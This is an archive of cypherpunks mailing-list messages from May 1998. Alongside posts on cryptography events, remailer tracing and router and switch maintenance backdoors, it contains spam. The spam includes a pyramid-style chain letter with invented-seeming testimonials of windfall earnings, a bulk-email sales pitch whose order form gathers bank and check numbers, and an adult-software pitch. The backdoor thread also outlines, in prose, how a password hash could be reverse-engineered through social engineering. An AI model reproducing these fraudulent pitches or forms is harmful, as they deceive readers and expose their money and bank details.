My name is Frank. My wife, Doris and I live in Bel-Air MD.  I am a cost accountant with a major U.S. Corporation and I make pretty good money.  When I received the program I grumbled to Doris about receiving "junk mail".  I made fun of the whole thing, spouting my knowledge of the population and percentages involved.  I "knew" it wouldn't work.  Doris totally ignored my supposed intelligence and jumped in with both feet.  I made merciless fun of her, and was ready to lay the old "I told you so" on her when the thing didn't work... well, the laugh was on me!  Within two weeks she had received over 50 responses.  Within 45 days she had received over $147,200 in $5 bills!  I was shocked!  I was sure that I had it all figured and that it wouldn't work.  I AM a believer now.  I have joined Doris in her "hobby".  I did have seven more years until retirement, but I think of the "rat race" and it's not for me. We owe it all to MLM.
     Frank T., Bel-Air, MD
The main reason for this letter is to convince you that this system is honest, lawful, extremely profitable and is a way to get a large amount of money in a short amount of time.  I was approached several times before I checked this out.  I joined just to see what one could expect in return for the minimal effort and money required.  To my astonishment, I received $36,470.00 in the first 14 weeks, with money still coming in.
     Sincerely yours, Phillip A. Brown,  Esq
     Not being the gambling type, it took me several weeks to make up my mind to participate in this plan.  But conservative that I am, I decided that the initial investment was so little that there was just no way that I wouldn't get enough orders to at least get my money back.  Boy was I surprised when I found my medium sized post office box crammed full of orders!  For a while it got so overloaded that I had to start picking up my mail at the window.  I'll make more money this year than any 10 years of my life before.  The nice thing about this deal is that it doesn't matter where in the U.S. people live.  There simply isn't a better investment with a faster return.
     Mary Rockland, Lansing, MI
     I had received this program before.  I deleted it but later I wondered if I shouldn't have given it a try.  Of course, I had no idea who to contact to get another copy, so I had to wait until I was e-mailed another copy of the program...11 months passed, then it came.  I didn't delete this one!  I made more than $41,000 on the first try!
     D. Wilburn, Muncie, IN
    This is my third time to participate in this plan.  We have quit our jobs and will soon buy a home on the beach and live off the interest on our money.  The only way on earth that this plan will work for you is if you do it.  For your sake, don't pass up this golden opportunity.  Good luck and happy spending!
    Charles Fairchild, Spokane, WA
ORDER YOUR REPORTS TODAY AND GET STARTED
ON THE ROAD TO YOUR FINANCIAL FREEDOM!!!


           
                    





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sun, 10 May 1998 15:26:06 -0700 (PDT)
To: kalliste@aci.net>
Subject: What Does Crash Mean? and Motion to Amend Order
Message-ID: <35562898.2B92@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sunday 5/10/98 3:49 PM

J Orlin Grabbe
John Young

Orlin, u 5/10/98 Albuquerque Journal

  What Does 'Crash' Mean?  Hang Around

  William Pfaff
  Syndicated Columnist

  PARIS -  A friend said to me the other day that the word  "crash"
  no longer is part of the American vocabulary.  We only know stock 
  market "correction," and corrections have just be waited out.
    He explained to me that the stock market only goes up, because 
  immense popular and political interests, as well as corporate
interests
  are today committed to its only going up.  His implied argument was
that the 
  American government has no choice but to make it go up.
    It struck me, as he was peaking, that this might have been what Jay
Gatsby
  was saying to his friends during the luxurious summer of 1929, a few
months
  before Gatsby disappeared off the end of that dock in West Egg, on
Long
  Island Sound, or went back to the Middle West - if it was the Middle
West -
  which, for Gatsby, would have been worse.   But I am a child of the
Depression. ...

Pfaff concludes

    I would stick with an older American assumption, that if something
seems too
  good to be true, it probably is.

Accompanying picture by NANCY OHANIAN/ LOS ANGLES TIMES SYNDICATE
has a bull pictured precariously perched atop a pinnacle ... with rocks
falling around its
feet.

John  I just saw  
  
  Payne-Morales v. NSA: Motion to Amend Order  May 9, 1998

and

  Froomkin on Payne-Morales Motion to Amend Order  May 9, 1998 at

http://www.jya.com/crypto.htm

But I will not read them until Monday.

Let's all hope someone sees the importance of posting the requested
documents on Internet.

Then settling this unfortunate mess.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Sun, 10 May 1998 13:57:32 -0700 (PDT)
To: csvcjld@nomvs.lsumc.edu
Subject: Re: corvette.bxa.doc.gov followup
In-Reply-To: <19980510072523421@nomvs.lsumc.edu>
Message-ID: <Pine.LNX.3.96.980510164411.21633A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 10 May 1998 csvcjld@nomvs.lsumc.edu wrote:

> 192.239.70.124 hit my ftp site on 4/13/98, the day after I announced a
> program to crack simple substitution ciphers on this list.  When I
> announced the program, I accidently gave it an .exe extension (when it
> actually had a .zip extension).  192.239.70.124 tried to get the .exe
> extension and then gave up.  Is it possible that 192.239.70.124 is
> driven by http://infinity.nus.sg/cypherpunks?

I would not doubt it. If I were BXA, and I wanted to keep tabs on 
crypto, I'd have an eye on cypherpunks. 

Does anyone know the infinity.nus.sg admins? Any chance of getting a
confirmation that corvette has hit them up?

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Two things fill the mind with ever new and increasing admiration and awe
the more often and steadily we reflect upon them: the starry heavens
above and the moral law within me. I do not seek or conjecture either of
them as if they were veiled obscurities or extravagances beyond the horizon
of my vision; I see them before me and connect them immediately with the
consciousness of my existence." - Immanuel Kant "Critique of 
Practical Reason"

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNVYR8wKEiLNUxnAfAQGJuwP+NtOI8O9sd9oivsvnrHTOJNadBVv89fJy
xOlCpFS93ESVjk7EqJwpU25lD5+0tE3f/bgHoHD5Tv52p6kVV9wms/lElnnzOxKU
HfGdw194NQPxvCdIfW11WW46Wl+NiUAgZ5clh6+uI+nC3fAHKxxemwflF/HRCmSb
0egTVVVseN4=
=dXfd
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sumanth <sumanth@wipinfo.soft.net>
Date: Sun, 10 May 1998 05:58:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Hi
Message-ID: <3555A5A5.6038AB44@wipinfo.soft.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi there,
  Is there anyway a mail from mix@anon.lcs.mit.edu can be tracked? If so
how..?

Awaiting a  reply

sumanth





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 10 May 1998 16:37:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: First meeting of DCS-NY -- The Digital Commerce Society of NewYork
Message-ID: <v04003a02b17be7bab19d@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


To: dcs-ny-rsvp@piermont.com
Subject: First meeting of DCS-NY -- The Digital Commerce Society of New York
Reply-To: perry@piermont.com
X-Reposting-Policy: redistribute only with permission
Mime-Version: 1.0 (generated by tm-edit 7.108)
From: "Perry E. Metzger" <perry@piermont.com>
Date: 10 May 1998 18:30:48 -0400
Lines: 31


[You are getting this either because you are either someone who
 I think would be interested in this announcement, or because you are
 on a mailing list devoted to issues related to electronic commerce. To
 prevent people from accidentally replying to the whole list, I've
 bcc'ed the recipients.

 Please feel free to forward this message to other interested
 individuals.]

As some of you probably know, Robert Hettinga has been running a group
called the Digital Commerce Society of Boston for some time now.  DCSB
meets once a month for lunch at the Harvard Club in Boston to hear a
speaker and discuss the implications of rapidly emerging internet and
cryptographic technologies on finance and commerce -- "Digital
Commerce", in short.

Interest has been expressed in starting a similar organization here in
New York. I'm therefore pleased to announce the initial meeting of the
Digital Commerce Society of New York (DCS-NY). We intend to meet the
second Tuesday of each month for lunch, probably at the Harvard Club
in New York, and conduct meetings much like those of DCSB.

If you are interested in attending our first luncheon meeting, which
will be held on June 9th, or if you wish to be informed of future
meetings by e-mail please send an RSVP to "dcs-ny-rsvp@piermont.com"
We will send out an announcement in about another week informing
people of the final choice of venue and the cost for the lunch.


Perry

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Sun, 10 May 1998 18:00:11 -0700 (PDT)
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: [Fwd: 3Com switches - undocumented access level.]
In-Reply-To: <Pine.BSF.3.91.980509032901.17424A-100000@mcfeely.bsfs.org>
Message-ID: <35564609.D3F85D5A@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


It is remote access - via telnet!

Rabid Wombat wrote:
> 
> Since you didn't specify the method of access. it is hard to determine if
> this is a large security hole. Most equipment can be rebooted and brought
> up without a password IF you have local access. For example, Cisco routers
> can be brought up without password simply by specifying the starting
> address of the load file, but you have to be at the local console to do
> this.
> 
> UNIX systems can be brought up w/o password in single-user mode, if you
> have local access. Yes, there are firmware passwords to guard against
> this on many systems, but one can always swap up the eeprom, etc.
> 
> I'd only be worried about the 3Com backdoor if it can be used remotely.
> Got any details?
> 
> -r.w.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Sun, 10 May 1998 20:59:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: U.S. Navy caught hacking into British marine charity Web site
In-Reply-To: <3554E2BF.5C3E2646@whitehouse.gov>
Message-ID: <v03110702b17c33e3bb04@[207.94.249.48]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:11 PM -0800 5/9/98, Spam the President wrote:
>It wouldn't make any sense. Why would a hacker use a military
>site that is actively monitored to hack into a site with less security?

Consider the wonderful irony of hacking into some site and having the blame
go somewhere else.

Consider a somewhat different circumstance.  I was recently in Organ Pipe
Cactus National Monument.  The southern border of the monument runs across
the US/Mexico border.  One of the stops on the tourist drive around the
monument is a parking lot 40 feet from a broken gate in the fence that
marks the border.  There is a large sign there suggesting that people not
leave their cars because of recent breakins.  There was also broken auto
glass on the ground.

Now, if I were breaking into cars, I would pick that parking lot, rather
than others further north, in hopes that everyone would blame the Mexicans.
Don't think I am sure that the Mexicans are not responsible, just that I
see a chance for some US lowlifes to deflect the blame.

I see the same opportunity in using a hacked Navy computer to hack a marine
mammal site.  It may be the Navy, or it may be a hacker with a polished
sense of irony.


-------------------------------------------------------------------------
Bill Frantz       | If hate must be my prison  | Periwinkle -- Consulting
(408)356-8506     | lock, then love must be    | 16345 Englewood Ave.
frantz@netcom.com | the key.     - Phil Ochs   | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@pig.die.com>
Date: Sun, 10 May 1998 19:39:38 -0700 (PDT)
To: Sunder <sunder@brainlink.com>
Subject: Re: [Fwd: 3Com switches - undocumented access level.]
In-Reply-To: <Pine.BSF.3.91.980509032901.17424A-100000@mcfeely.bsfs.org>
Message-ID: <19980510223401.C22003@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, May 10, 1998 at 08:27:53PM -0400, Sunder wrote:
> It is remote access - via telnet!
> 
	This is not that uncommon.   We implemented such a backdoor in a
router I worked on the design of some years ago.   The magic password
was a function of the model and serial number of the machine (not as I
remember a very strong hash either), and different for all boxes.  We
(or rather the marketing and support people) felt that leaving a
customer who forgot his password with no option but reset the router to
its factory defaults was more undesirable than providing a potential
attack point for  sophisticated hackers and spooks - the problem being
that there was  often days of work in setting up the configuration and
getting it right, and if the customer did not have a good backup forcing
him to destroy all of his hard won setup just because he couldn't
remember which wife's name he used as the password wasn't a good deal. 
And from a support point of view, helping the turkey to get everything
right again was very expensive and painful, whereas leaving a hole for 
a possible sophisticated attacker was not something that cost support
very much even if some bad guy used it to do real damage.

	I think most if not all uses of our backdoor were handled by
having someone in our customer support login to the machine and
restablish a password or give the customer the specific master password
for his box - I don't think we ever gave anyone the hash.

	I suspect that a large fraction of alarms, security systems,
pbxs and the like incorperate such backdoors for precisely the same 
kinds of reasons - it is simply too catastrophic to reset everything
if someone forgets the password.   I know several commercial Unixes
had such backdoors in them for emergency access years ago, and wouldn't
be overwhelmingly surprised if some current OS's still have magic backdoors.

	Of course these holes are dangerous, as it is not beyond possible
for someone with serious criminal intentions to obtain a copy of your product
and slog through the EPROMS/flash memory with a disassembler and determine
the magic algorithm which may give him access to all other machines running
the same basic code, especially if he has some method of poking around
in memory of his target machine or predicting such things as its secret
serial numbers. 

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 79126992@00195.com
Date: Sun, 10 May 1998 22:31:02 -0700 (PDT)
To: Friend@public.com
Subject: Mail Your Message to Millions
Message-ID: <19970350058.CAA990557@90009COMLINKNET.COM>
MIME-Version: 1.0
Content-Type: text/plain


received: from invooc.com ([207.28.502.416]) by nnbfgwzz345.comlinkcom.net
(Intermail v3.1 177 234) with SMTPid <199803230830.aqwwe122@bell.net> 
for <racqquiuui@bellsouth.net>; Fri, 6 Feb 1998 05:08:30 +0000
Received: (qmail 9695 invoked by ter 0); 3 Apr1998 05:08:29 -0000
Message-ID: <19980323829.9694.qmail@tonight.com>
 Received: from 149.107.252.10 by www.msn.com with HTTP;
Thu, 05 Feb 1998 21:08:29 PSTX-Originating-IP: [153.145.252.17]
From: "Damion Potter" <d.pohhllpl343er@prodigy.net> 
To: prede568qukdd8@bellsouth.net 
Cc: flexal5yyt7876l@prodigy.net
Subject: Fw: please 
Content-Type: text/plain
Date: Thu, 05 Feb 1998 21:08:29 PST


Tired of NOT making money on the internet?

Did you REALLY believe that ALL you had to do was:

Put up a web page somewhere in Cyberspace with beautiful graphics,
the latest Java and some frames;

Advertise in a few free classifieds;

Act like an expert in newsgroups; since you're not 
supposed to advertise in them;

And, customers were going to beat a path to your door.

If you believed that-
BOY, have I got some swampland in Florida for you!

If you want to make money on the internet,
YOU'D better be PROACTIVE!

YOU'D better go after business like you MEAN IT!

YOU'D better send some E-MAIL - Lots of it!

And YOU'D better tell your story as much as you can,
as often as you can,
to whomever you can!

WELCOME TO THE REAL WORLD.

Bulk e-mail works!

If you know how to write an ad,
identify a need, and fullfill it with your product,
you can make money on the Internet
EVEN on a very limited budget.

This form of advertising has been proven MUCH MORE EFFECTIVE
than other forms of advertising because people read their e-mail.
And, the message will wait in the recipient's e-mail box until it is
read. Your message is SEEN not buried!

Your business deserves a piece of the fastest growing industry in the
U.S.- THE HOME-BASED BUSINESS INDUSTRY ( $427 billion in annual
sales).  Internet sales are projected to be over $10 billion by the 
year 2000, up from $300 million in 1994.

We've got the addresses YOU need.

A Web site alone, posting through newsgroups and registering with a 
few search engines while placing a few classifieds just won't work.

What good is a Web page no one knows is there?

Bulk e-mailing is the lowest-cost method of generating qualified sales leads,
On average, a solo direct (snail) mail promotion would cost around
$500.00 per thousand, whereas bulk e-mail costs pennies per thousand. No
known form of media advertising can compete with the low cost of bulk e-mail.

Our e-mail lists are maintained on state-of-the-art computers and are
updated daily to assure you the very latest names for your mailings. 

Bulk Email Works!!

Put your sales message in front of responsive buyers. Our lists are
compiled from active and willing on-line purchasers and entrepreneurs. 
THESE ARE SERIOUS CUSTOMERS LOOKING FOR SERIOUS OFFERS!
These BUYERS want to read and hear more about your products/services.
Our list is updated daily with fresh and new email addresses.

Even if you receive 1/10 of 1% response for mailing 1,000,000 email
addresses you would receive 1000 replies !!!!

How much money would you make?

Save TIME and MONEY! Make money on the seat of your Pants! Focus
entirely on your sales. Let us do your mailing for you at these
INCREDIBLY LOW RATES:

_____YES- mail my message to 50,000 responsive buyers for $49.95

_____YES- mail my message to 100,000 responsive buyers for $89.95

_____YES- mail my message to 250,000 responsive buyers for $199.95

_____YES- mail my message to 500,000 responsive buyers for $359.95

_____YES- mail my message to 1,000,000 responsive buyers for $679.95

_____YES- mail my message to 2,000,000 responsive buyers for $1299.95


*************** WE SPECIALIZE IN TARGETED MAILINGS - CALL FOR DETAILS***************

_____YES- mail my message to 5,000 targeted buyers for $79.95

_____YES- mail my message to 10,000 targeted buyers for $119.95

_____YES- mail my message to 15,000 targeted buyers for $154.95

_____YES- mail my message to 20,000 targeted buyers for $184.95

_____YES- mail my message to 30,000 targeted buyers for $244.95

_____YES- mail my message to 40,000 targeted buyers for $299.95

_____YES- mail my message to 50,000 targeted buyers for $349.95

Type of business or  people you need  to target __________________________
_________________________________________________________________

 
We MAIL, MAIL, MAIL-
YOU SELL, SELL, SELL.

REMEMBER:
Get 1/10 of 1% and from a mailing of 1,000,000 email addresses 
and you get 1000 replies!!!

Would you make any money?

We take CHECKS BY FAX 
get our most up to date list mailed for YOU by ordering NOW ! !

Call 407-956-1151 to order by phone or Fax your order to 407-952-7984 
Office hours are Mon-Fri 10 am - 6 pm Eastern Standard Time. 

Make checks or money order payable to: PICC

Or mail check or money order to: 

Progressive Internet Communications, Co.
P.O. Box 100512
Palm Bay, Florida 32910-0512

ORDER YOUR MAILING PROGRAM TODAY ! !
  

ORDER FORM
========================================================
Name___________________________________________
Address__________________________________________
City______________________State_________Zip_______
E-Mail Address____________________________________
Phone___________________________________________
Business phone____________________________________

Check Ordering info:
Name( exactly as it appears on check)
______________________________________________________
Check number_______________Dollar Amount_________________
**Fraction Code(numbers that appear below check number on top right)
(do not leave blank-ex:123-45/6789)__________________________
Numbers at Bottom of check(read left to right please indicate blank spaces
with a space)____________________________________________
Bank Name_____________________________________________
Bank Address____________________________________________
Bank City/Bank Zip Code___________________________________
Bank phone # (if applicable)_________________________________
 

____________________________________________________





                             == TAPE CHECK HERE ==



____________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 11 May 1998 05:29:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: DCSB: Michael Baum; PKI and the Commercial CA
Message-ID: <v04003a13b17c9e1a06a9@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: rah@pop.sneaker.net
Mime-Version: 1.0
Date: Mon, 11 May 1998 07:23:28 -0400
To: dcsb@ai.mit.edu, dcsb-announce@ai.mit.edu
From: Robert Hettinga <rah@shipwright.com>
Subject: DCSB: Michael Baum; PKI and the Commercial CA
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga <rah@shipwright.com>

-----BEGIN PGP SIGNED MESSAGE-----

[Because Mr. Baum became ill at the last minute this February, we have
rescheduled him for the upcoming DCSB meeting... --RAH]


              The Digital Commerce Society of Boston

                            Presents

                        Michael S. Baum
                         VeriSign, Inc.

                        PKI Requirements
                             from a
                   Commercial CA's Perspective

                    Tuesday, June 2, 1998
                           12 - 2 PM
               The Downtown Harvard Club of Boston
                  One Federal Street, Boston, MA


Requirements for the provision of commercial certification products and
services are under consideration by many companies. Similarly, efforts to
regulate certification authorities (CAs) and public key infrastructure (PKI)
are proliferating by many domestic and foreign governments. Underlying many
of these efforts is the intention to assess and assure quality and
trustworthiness, and yet the nature, scope and regime to accomplish these
goals remain elusive or at least have been balkanized.

This presentation will consider CA and PKI requirements from the experiences
and perspective of a commercial CA. It will survey current approaches to
ascertaining quality and performance as well as their limitations. It will
then propose a path forward. Many of these issues are present real
challenges to both the CAs and the user community. A lively dialog is
welcomed.


Michael S. Baum is Vice President of Practices and External Affairs,
VeriSign, Inc.  His responsibilities include developing practices and
controls under which VeriSign conducts its public Digital ID and private
label certificate operations.

Mr. Baum is the Chair of the Information Security Committee, and Council
Member of the Section of Science and Technology, of the American Bar
Association. He is Chairman of the International Chamber of Commerce (ICC)
ETERMS Working Party and a Vice Chairman of the ICC's Electronic Commerce
Project, a delegate to the United Nations Commission on International Trade
Law on behalf of the ICC. He is a member of various digital signature
legislative advisory committees.

Mr. Baum is co-author (with Warwick Ford) of Secure Electronic Commerce
(Prentice Hall, 1997), author of Federal Certification Authority Liability
and Policy - Law and Policy of Certificate-Based Public Key and Digital
Signatures (NIST, 1994), co-author of Electronic Contracting, Publishing and
EDI Law (Wiley Law Publications, 1991), and contributing author to EDI and
the Law (Blenheim Online, 1989), and the author of diverse information
security publications including the first American articles on EDI law. He
was honored as an EDI Pioneer in 1993 (EDI Forum) and was the Recipient of
the National Notary Association's 1995 Achievement Award. He is a member of
the Massachusetts Bar.


This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, June 2, 1998, from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, on One Federal Street. The price for lunch is
$32.50. This price includes lunch, room rental, various A/V hardware, and
the speaker's lunch. ;-).  The Harvard Club *does* have dress code: jackets
and ties for men (and no sneakers or jeans), and "appropriate business
attire" (whatever that means), for women.  Fair warning: since we purchase
these luncheons in advance, we will be unable to refund the price of your
lunch if the Club finds you in violation of the dress code.

We will attempt to record this meeting for sale on CD/R, and to put it on
the web in RealAudio format, at some future date.


We need to receive a company check, or money order, (or, if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by Saturday,
May 30th, or you won't be on the list for lunch.  Checks payable to
anyone else but The Harvard Club of Boston will have to be sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston", in the amount of $32.50. Please include your e-mail
address, so that we can send you a confirmation

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.


Upcoming speakers for DCSB are:

July      Rodney Thayer       IPSEC and Digital Commerce
August    TBA
September TBA
October   Peter Cassidy       Intellectual Property Rights Management

TBA       Jeremey Barrett     Digital Bearer Settlement

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, <mailto: rah@shipwright.com>.


For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to <mailto: majordomo@ai.mit.edu> . If
you want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the
body of a message to <mailto: majordomo@ai.mit.edu> .

We look forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston



-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNVbff8UCGwxmWcHhAQFEcwgAq7w35o/XmKxTL7k3vQOtAtCVCiGUH3Ow
FUIP2B2riGNTGaCsTO3gliuK0nulXq/9qKjqYXmmg6P0tmMuLHXFgq3rxP284rUg
hfqU/7hswJHjwPFzuwu9BbKEd2pG6ryY3epsEsNpenAlxfbChJJ0E6Y8L/yQh6FX
qxB2L5gxf3POOT0/HiSDORemtHp7dKonsCC7yFGvERTda+byAE7ypFQoVFn14gt0
2cDDCX2yynrCozD4aTHIOxwli2bsenTHIzyLY9I5V3gHkCUBf1ocXuiqrfIy8jHR
4ibg0VAvN5Fbnc363iqIGrLdcVJYb46Nc/3EvPqr67ImIySeiKDMXA==
=ilR4
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/



For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Mon, 11 May 1998 07:55:43 -0700 (PDT)
To: die@die.com
Subject: Re: [Fwd: 3Com switches - undocumented access level.]
In-Reply-To: <Pine.BSF.3.91.980509032901.17424A-100000@mcfeely.bsfs.org>
Message-ID: <35571029.EBEB4953@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Emery wrote:

>         This is not that uncommon.   We implemented such a backdoor in a
> router I worked on the design of some years ago.   The magic password
> was a function of the model and serial number of the machine (not as I
> remember a very strong hash either), and different for all boxes.  We
> (or rather the marketing and support people) felt that leaving a
> customer who forgot his password with no option but reset the router to
> its factory defaults was more undesirable than providing a potential
> attack point for  sophisticated hackers and spooks 

This is still unexcusable.  It would have been just as simple to include a
hidden reset switch in a pannel somewhere that would zap all the passwords
on the router without zapping the config, and maybe send some alarms out
via SNMP incase it wasn't something that was wanted.

That would be something the client could do themselves without opening
security holes.


>         I suspect that a large fraction of alarms, security systems,
> pbxs and the like incorperate such backdoors for precisely the same
> kinds of reasons - it is simply too catastrophic to reset everything
> if someone forgets the password.   I know several commercial Unixes
> had such backdoors in them for emergency access years ago, and wouldn't
> be overwhelmingly surprised if some current OS's still have magic backdoors.

That doesn't mean that the ankle biters won't find them.  For example, I could
put a sniffer on the network coming into the router and call up tech support
and say "Hi" I lost my password, here's my IP address, help, help.

I can then do the same thing a week later with the same router incase the
hash is time dependant, and then later with another router with a different
serial number, and I'll have much info to get started on how your hash works.

Piece of cake.
 
>         Of course these holes are dangerous, as it is not beyond possible
> for someone with serious criminal intentions to obtain a copy of your product
> and slog through the EPROMS/flash memory with a disassembler and determine
> the magic algorithm which may give him access to all other machines running
> the same basic code, especially if he has some method of poking around
> in memory of his target machine or predicting such things as its secret
> serial numbers.

Yep.
 

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sable1949 <Sable1949@aol.com>
Date: Mon, 11 May 1998 09:25:28 -0700 (PDT)
Subject: Last Chance
Message-ID: <7c5a0890.35571269@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


If you wish to be removed, Reply with "REMOVE" as the subject.

The Virtual Girlfriend and Virtual Boyfriend are artificial intelligence 
programs for your IBM PC or compatible and also for MACINTOSH. You 
can watch them, talk to them, ask them questions, tell them secrets, and 
relate with them.  Watch them as you ask them to take off different clothes
and guide them through many different activities. Watch and participate in
the hottest sexual activities available on computer, including: several
sexual positions, using many unique toys, even bringing in multiple partners.
This is no doubt one of the most realistic, sexually stimulating computer
games available. They will remember your name, birthday, your likes and your
dislikes. Every time you start the program, they say different things, and
act differently. Each time, they have a different personality. With the VGA
digital graphics, The Virtual Girlfriend and Virtual Boyfriend software have
some of the hottest, sexiest graphics out there.  And with a Soundblaster or
compatible card, you can actually hear their voice as they talk to you. This
is the first adult software title that was designed for both heterosexual and
homosexual people. I would like you to try the actual full copy out before it
is put on the market.  It will be sold for 1/5 of the actual price ($10.00)
until I can get back some information on what people think of the program.  
Please give it a try and write back any comments.      Thank you.

    If you are interested and would like to order a copy, then you can read
the mailing instructions below.  It comes in an unmarked package and you are 
not put on any mailing lists whatsoever, guaranteed. It will run on any 386, 
486 or higher,  and 100% IBM compatibles.  Required is VGA graphics, and a 
hard drive.The sound card is optional. Macintosh requires at least 4 meg of 
ram.  
Virtual Girlfriend and Virtual Boyfriend are artificial intelligence
programs, meaning they are completely interactive. It would be just like if
you were talking to someone.  You can actually have simple conversations.  
Their attitudes change with the different things you say, so you can say
things that will upset them, and then say things that will please them. The
more you play/talk with them, the more you learn what they can do, and what 
they like to do. It really is a blast.  With all these movies coming out
about virtual reality, it's amazing to actually have a virtual reality
program like this for your own computer. It's easy to install, and
instructions are easy to follow.     

  ~~~~~~~~~~~~~~~~Special Software Offer~~~~~~~~~~~~~~~~~~
This is to inform you about the new adult game that VCS Magazine
rated "The best game of "97".  "The Search for Paradise is no doubt one 
of the greatest XXX adult games available".  The first games where it is
as much fun as it is a turn on!  Travel the world to every continent, every
country you can think of, and meet some of the most beautiful women in
existence.  These women will treat you like a king and obey your every
command.  Any sexual wish you can think of, these women know it all.  
There is a different paradise for every guy out there, and this game will
have them all.  This game uses real models, digital video, and digital sound
to make it as realistic as possible.  You will feel like you're in the same
room as the girl you're talking to!!!

          As an added bonus you'll receive "Club Celebrity X"
     Meet, talk to and even have your way with the celebrities of your choice.
     Imagine being in a club with some very beautiful, well known, actual
     celebrities! You have seen these girls on T.V., Magazines and billboard
ads.
     Now they are on your computer begging for action.  This game is hot and
once you
     start playing, you won't be able to stop!!!

~Required: 386 or better, 4 meg ram or better, Windows 3.1 or higher (Win95
is fine), sound card is optional, Rom is optional.  (Game is given either
CD-rom or compressed 3.5" diskettes).~~$19.95!

                            Order now and get everything for just $24.95!!!!

     
At your request, the programs can come with a password protection utility
that only allows the program to run when the correct password is entered. 
                
                                   (You must be 18 or over to purchase)


Please fill out the following form and mail it to the address above.  
(Feel free to write out the order form by hand)

                        
